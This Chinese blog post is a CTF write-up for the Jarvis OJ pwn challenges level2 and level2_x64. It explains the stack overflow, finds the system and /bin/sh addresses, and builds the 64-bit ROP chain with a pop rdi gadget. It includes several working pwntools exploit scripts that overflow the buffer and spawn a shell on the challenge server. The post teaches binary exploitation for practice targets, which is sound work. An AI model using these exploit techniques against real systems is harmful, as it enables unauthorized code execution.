jarivs oj中的level2与level2_x64

最新推荐文章于 2024-07-05 00:58:41 发布
最新推荐文章于 2024-07-05 00:58:41 发布
阅读量268 收藏 2
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45213259/article/details/97289764
版权

jarivs oj中的level2与level2_x64的相同与区别

level2

题目链接https://dn.jarvisoj.com/challengefiles/level2.54931449c557d0551c4fc2a10f4778a1

对于这道题,按照基本思路就是先拖入ubuntu中进行查壳,输入checksec level2
在这里插入图片描述
然后我们会发现它只打开了NX保护机制,又是典型的栈溢出,发现是32位的,再将文件拖入32位的IDA中查看
按照常规首先查看主函数
在这里插入图片描述在查看主函数的过程中,会发现’hello world’下面一行就是call system,突然发现跟之前的题有点像,先不管这个,我们继续按Tab加空格键进行跟随

在这里插入图片描述你会发现这里调用了vulnerable_function()的函数,继续跟进去看看
在这里插入图片描述
会发现这里的read函数,即在这里栈溢出。
接下来继续去找system和’/bin/sh’,还记得刚才看到的call system的函数吗,在这里用到了,我们点击进去刚才的函数
在这里插入图片描述
在双击_system,进入system
在这里插入图片描述这里的08048320即为system的地址
按常规,我们再按Shift加F12进行查看String window
在这里插入图片描述发现这里有/bin/sh,我们跟随着点进去
在这里插入图片描述这里的0804A024即为/bin/sh的地址,接下来我们就可以写脚本了
脚本1:

from pwn import *
io = remote('pwn2.jarvisoj.com',9878)
elf = ELF('./level2')
sys_addr = elf.symbols['system']
print p32(sys_addr)
sh_addr = elf.search('/bin/sh').next()
payload = 'A' * (0x88 + 0x4 ) + p32(sys_addr)+p32(0x1) + p32(sh_addr)
io.sendlineafter("Input:\n",payload)
io.interactive()
io.close()

脚本2:

from pwn import *
io = remote('pwn2.jarvisoj.com',9878)
sys_addr = 0x08048320
sh_addr = 0x0804A024
payload = 'A' * (0x88 + 0x4) + p32(sys_addr) + p32(0xdeadbeef) + p32(sh_addr)
io.sendline(payload)
io.interactive()
io.close()

发现脚本1与脚本二的不同了吗,脚本2相对于脚本1去掉了

elf = ELF('./level2')

然后把下面两个换成了相应的地址

sys_addr = elf.symbols['system']
sh_addr = elf.search('/bin/sh').next()

是不是发现方便了很多,当然如果确定有system和/bin/sh,但找不到的话,或者防止出错,建议使用第一种脚本。对于脚本1和脚本2中的payload,脚本1中的payload中是p32(0x1),脚本2中的payload是p32(0xdeadbeef),其实对于这个没有什么特别的规定,只要是一些东西用来覆盖system中的值即可。
对于payload中,‘A’ * (0x88 + 0x4)用来填满buf,后面加上system的地址,之后再跟上/bin/sh的地址,用system来执行/bin/sh,但是对于32位的要先覆盖后执行。运行脚本即得到flag。

level2_x64

同level2一样,先进行查壳,发现是64位的,直接拖进64位的IDA中查看即可,相同的步骤就不再叙述了,对于level2_x64与level2的区别在于,x64中的前六个参数以此保存在rdi,rsi,rdx,rcx,r8,r9中,还有其他的值才会保存在栈中,因此我们要找到rdi的地址,将执行地址直接加到rdi之上,进行栈溢出,建议查看一下x86-64位汇编语言会更加清楚。
因此我们需要找到rdi的地址
这里我们需要用到ROPgadget这个工具进行查找地址,
在ubuntu的终端输入

ROPgadget --binary level2_x64 --only "pop|rdi|ret"

进行查找
在这里插入图片描述发现中间的
在这里插入图片描述这一句是有用的,而前面的4006b3即为rdi的地址
接下来我们来写脚本
脚本1:

from pwn import *
r=remote('pwn2.jarvisoj.com',9882)
e=ELF('./level2_x64')
sys_addr=e.symbols['system']
bin_addr=e.search('/bin/sh').next()

payload='a'*0x80+'bbbbbbbb'+p64(0x4006b3)+p64(bin_addr)+p64(sys_addr)+'junkjunk'
r.send(payload)
r.interactive()

脚本2:

from pwn import *
p=remote("pwn2.jarvisoj.com","9882")
sys_addr=0x40063E
sh_addr=0x600A90
payload='a'*0x88+p64(0x4006b3)+p64(sh_addr)+p64(sys_addr)+p64(0x1)
p.sendline(payload)
p.interactive()

发现没有脚本2中我把所有的都直接换了地址,对于x64位与32位的,你会发现它增加了rdi的地址,并且把/bin/sh的地址放在了system地址之前,最后才对system中的值进行覆盖,即32位的先覆盖后执行,x64位的先执行后覆盖。
执行脚本便可发现flag。

泽N煜
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Jarvislevel2_x64--64位简单栈溢出
qq_43613144的博客
07-26 427
ROPgadget 查找可存储寄存器的代码 ROPgadget --binary level_x64(名字) --only 'pop|ret' | grep 'eax' 查找字符串 ROPgadget --binary rop --string "/bin/sh" 查找有int 0x80的地址 ROPgadget --binary rop --only 'int' ...
jarvisoj_level2_x64
z1r0的博客
12-05 122
jarvisoj_level2_x64 查看保护 溢出,有system sh from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 26759) else: r = process(file_name) elf = ELF(file_name) def
jarvisoj——[XMAN]]level2(x64)
王嘟嘟的博客
07-19 368
题目 Wp 这里检查一下基础项 这里看了一下,发现还是read这里出现了问题,需要进行覆盖 构造一下payload from pwn import * r=process("./level2_x64") #r=remote('pwn2.jarvisoj.com',9882) e=ELF('./level2_x64') sys_addr=e.symbols['system'] bin_addr=e.search("/bin/sh").next() pop_rdi=0x4006b3 payload='
【BUUCTF-PWN】13-jarvisoj_level2_x64
最新发布
燕麦葡萄干的博客
07-05 391
ret指令的地址,再接着是’/bin/sh’字符串的地址,最后是system()函数的地址。ret处,该指令会将当前栈顶的元素(‘/bin/sh’字符串的地址)出栈并存入rdi,并返回到下一条指令处。此时栈就只有system()函数的地址了,所以下一条指令正是system(),而它需要的参数正好就在rdi寄存器,这样就执行了system(’/bin/sh’)现在只需要让函数返回到system,并传入参数“/bin/sh”就可以了。32位的比较简单,只需要返回地址+下一次的返回地址+参数1+参数2+…
buuctf|pwn-jarvisoj_level2_x64-wp
l2645470582_的博客
11-08 451
1.例行检查保护机制 只开启了堆保护 2.我们用64位的IDA查看该文件 shift+f12查看关键字符串,我们看到关键字符串“/bin/sh” 我们双击“/bin/sh”,bin/sh的地址为:0x0600A90 3.查看main函数里面的内容 进入vulnerable_function()函数 我们看到buf只有0x80个字节,但是下面read()里面读取了0x200个,这里造成了溢出 4.system("/bin/sh")才能拿到权限 我们找...
JarvisOJ level2x64
PLpa的博客
07-09 515
这题和level2的漏洞和处理方式差不多,只不过level2是x86而这题是x64的 前言: 首先,我们先看一下x64和x86的区别: linux_64与linux_86的区别主要有两点:首先是内存地址的范围由32位变成了64位。但是可以使用的内存地址不能大于0x00007fffffffffff,否则会抛出异常。其次是函数参数的传递方式发生了改变,x86参数都是保存在栈上,但在x64的前六个参...
jarvis_data_eng_manpreet
05-26
Jarivs数据工程培训 进行 正在进行的 正在进行
Jarvis OJ [XMAN]level2(x64)
九层台
07-07 1147
liu@liu-F117-F:~/桌面/oj/level2_x64$ checksec level2_x64 [*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level2_x64/level2_x64' Arch: amd64-64-little RELRO: No RELRO Stack: No canary fo...
jarvis oj level2_x64
发蝴蝶和大脑斧的博客
12-05 537
接下来做64位了,首先看下和32位有什么不一样。这篇文章的第3节说的很详细 主要来说就是: 1.内存地址的范围由32位变成了64位,但是可以使用的内存地址不能大于0x00007fffffffffff,否则会抛出异常。 2.x64的前六个参数依次保存在RDI,RSI,RDX,RCX,R8和 R9,如果还有更多的参数的话才会保存在栈上。我们要修改寄存器的值就得通过找到例如pop rdi;ret这样...
Jarvis步进法(Jarvis March)凸包算法
言午日月
01-10 719
这样可以确保在构建的凸包上,点的极角是递增的,最终形成一个逆时针方向的凸多边形。算法的时间复杂度主要取决于对点的排序操作,通常为O(n log n),其n是点的数量。从点集选择一个起始点,然后在每一步选择下一个顶点,该顶点是当前点集与当前点形成的线段上,极角最小的点。扫描过程: 从起始点开始,选择当前点(假设为p),然后选择下一个点(假设为q),这个点是当前点p与其他点形成的线段上,极角最小的点。选择起始点的过程可以通过遍历点集,找到y坐标最小的点,并在y坐标相同时,选择x坐标最小的点。
oj level2_x64 简单栈溢出(64)
weixin_44954083的博客
07-12 252
一开始就看一下这道题的保护机制和位数 由于NX是保护的,所以栈上的数据没有执行权限 防止攻击手段:栈溢出 + 跳到栈上执行shellcode 因为这道题是64位的,不是32位,32位和64位的主要区别在于函数参数传递的方式, 32位程序函数的参数是压在栈的,而64位程序的前6个参数是存在寄存器的,第7个开始才压入栈。就是前6个是从左到右,多于6个的时候时,就是从右到左压入堆栈, 64位主要...
(Jarvis Oj)(Pwn) level2(x64)
Nothing
04-19 1421
(Jarvis Oj)(Pwn) level2(x64) 首先用checksec查一下保护,和level2一样。 反汇编,程序和32位的程序几乎一致。找到溢出点。 那么溢出思路也和32位的差不多,唯一不同的是,64位程序在调用system函数时,参数的传递方式和32位不一样,32位是通过栈传参,而64位通过edi寄存器传参,所以这时我们的思路变成如何覆盖edi的值,通过基本rop就可...
攻防世界level2 x_64位
qq_44832048的博客
07-25 1592
64位程序在调用system函数时,参数的传递方式和32位不一样,32位是通过栈传参,而64位通过edi寄存器传参,所以这时我们的思路变成如何覆盖edi的值,通过基本rop就可以做到,利用程序自己的带有pop edi/rdi;ret语句达到给edi赋值的效果。pop edi语句是将当前的栈顶元素传递给edi,在执行pop语句时,只要保证栈顶元素是”/bin/sh”的地址,并将返回地址设置为syst...
[BUUCTF]PWN——jarvisoj_level2_x64
BangSen1的博客
03-30 1353
jarvisoj_level2_x64 例行检查 ,64位,开启NX保护, 运行一下 用IDA打开。 systemaddr=0x40063e shalladdr=0x400A90 查看主函数,buf的长度为0x80,读取的长度为0x200,可以造成溢出漏洞。 rdiaddr= 0x4006b3 from pwn import * context(log_level = 'debug') elf = ELF('./level2_x64') p = remote('node3.buuoj.cn',
#Jarivs算法# [luogu P2742] [USACO5.1]圈奶牛Fencing the Cows /【模板】二维凸包
Nowed
08-04 191
Title https://www.luogu.com.cn/problem/P2742 Solution JarivsJarivsJarivs算法主要步骤: 找到最左边的点 核心部分PROC1PROC1PROC1,顺时针进行凸包。枚举两点,用叉积计算夹角,选择最左的解,如果三点共线,选择最远的点。 Code #include<cstdio> #include<algorithm> #include<cmath> #include<iostream>
Jarvis oj-pwn level2-64
hanqdi_的博客
02-09 141
pwn level2-64 检查保护机制 放入ida分析 在ida 发现有system函数,再查找下也有binsh字符串。 由于是64位的,所以,传参数时要注意,前6个参数是存在寄存器里的。 rdi的地址 利用pop ret 指令来传递参数,pop rdi,将参数binsh弹出栈,并存入rdi寄存器,再ret返回栈,再执行system函数,参数从rdi取出。 构造脚本如下: ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值